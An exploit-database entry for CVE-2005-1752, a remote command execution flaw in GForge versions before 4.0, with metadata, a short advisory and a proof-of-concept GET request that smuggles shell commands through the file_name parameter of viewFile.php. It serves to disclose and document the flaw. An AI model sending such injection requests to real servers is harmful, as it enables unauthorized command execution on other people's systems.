GForge 3.x - Arbitrary Command Execution

Author: Filippo Spike Morelli
type: webapps
platform: php
port: 
date_added: 2005-05-24  
date_updated: 2013-05-24  
verified: 1  
codes: CVE-2005-1752;OSVDB-16930  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 25693.txt  

source: https://www.securityfocus.com/bid/13716/info

GForge is affected by a remote command execution vulnerability.

This issue arises because the application fails to sanitize user-supplied data passed through URI parameters.

An attacker can supply arbitrary shell commands through the affected parameter to be executed in the context of the affected server.

GForge versions prior to 4.0 are vulnerable to this issue.

GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a